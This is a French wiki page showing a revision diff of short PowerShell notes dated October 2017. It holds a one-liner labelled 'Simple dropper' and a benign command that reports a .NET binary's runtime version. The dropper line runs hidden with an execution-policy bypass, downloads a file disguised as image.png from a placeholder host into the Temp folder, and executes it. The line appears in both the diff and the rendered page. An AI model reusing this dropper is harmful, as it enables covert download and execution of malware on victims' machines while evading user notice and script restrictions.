« PowerShell » : différence entre les versions
Aller à la navigation
Aller à la recherche
(Page créée avec « Simple dropper powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Te... ») |
Aucun résumé des modifications |
||
| Ligne 2 : | Ligne 2 : | ||
powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Temp\image.png'); Start-Process('C:\Users\admin\AppData\Local\Temp\image.png') |
powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Temp\image.png'); Start-Process('C:\Users\admin\AppData\Local\Temp\image.png') |
||
Find the framework version of a binary |
|||
[Reflection.Assembly]::ReflectionOnlyLoadFrom("C:\Users\futex\Desktop\test.exe").ImageRuntimeVersion |
|||
v2.0.50727 |
|||
Version du 31 octobre 2017 à 14:40
Simple dropper
powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Temp\image.png'); Start-Process('C:\Users\admin\AppData\Local\Temp\image.png')
Find the framework version of a binary
[Reflection.Assembly]::ReflectionOnlyLoadFrom("C:\Users\futex\Desktop\test.exe").ImageRuntimeVersion
v2.0.50727